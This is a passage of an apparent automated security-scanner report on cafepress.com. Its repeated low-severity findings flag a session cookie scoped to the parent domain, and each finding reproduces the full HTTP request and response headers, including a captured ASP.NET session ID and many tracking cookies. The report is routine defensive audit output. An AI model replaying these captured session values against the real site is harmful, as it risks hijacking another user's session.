<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]...
2.55. http://www.cafepress.com/make/custom-hats
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/make/custom-hats
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /make/custom-hats HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW21
Cteonnt-Length: 54657
Date: Sun, 26 Dec 2010 13:48:07 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 54657

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]...
2.56. http://www.cafepress.com/make/custom-hoodies-sweatshirts
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/make/custom-hoodies-sweatshirts
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /make/custom-hoodies-sweatshirts HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW19
Cteonnt-Length: 69583
Date: Sun, 26 Dec 2010 13:47:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 69583

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]...
2.57. http://www.cafepress.com/make/custom-ipad-case
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/make/custom-ipad-case
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /make/custom-ipad-case HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW22
Cteonnt-Length: 55427
Date: Sun, 26 Dec 2010 13:48:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 55427

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]...
2.58. http://www.cafepress.com/make/custom-iphone-cases
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/make/custom-iphone-cases
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /make/custom-iphone-cases HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW22
Cteonnt-Length: 57068
Date: Sun, 26 Dec 2010 13:48:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 57068

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]...
2.59. http://www.cafepress.com/make/custom-mugs
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/make/custom-mugs
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /make/custom-mugs HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW14
Cteonnt-Length: 53712
Date: Sun, 26 Dec 2010 13:47:44 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 53712

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]...
2.60. http://www.cafepress.com/make/custom-stickers
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/make/custom-stickers
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /make/custom-stickers HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW15
Cteonnt-Length: 55145
Date: Sun, 26 Dec 2010 13:47:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 55145

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]...
2.61. http://www.cafepress.com/make/custom-stockings
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/make/custom-stockings
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /make/custom-stockings HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
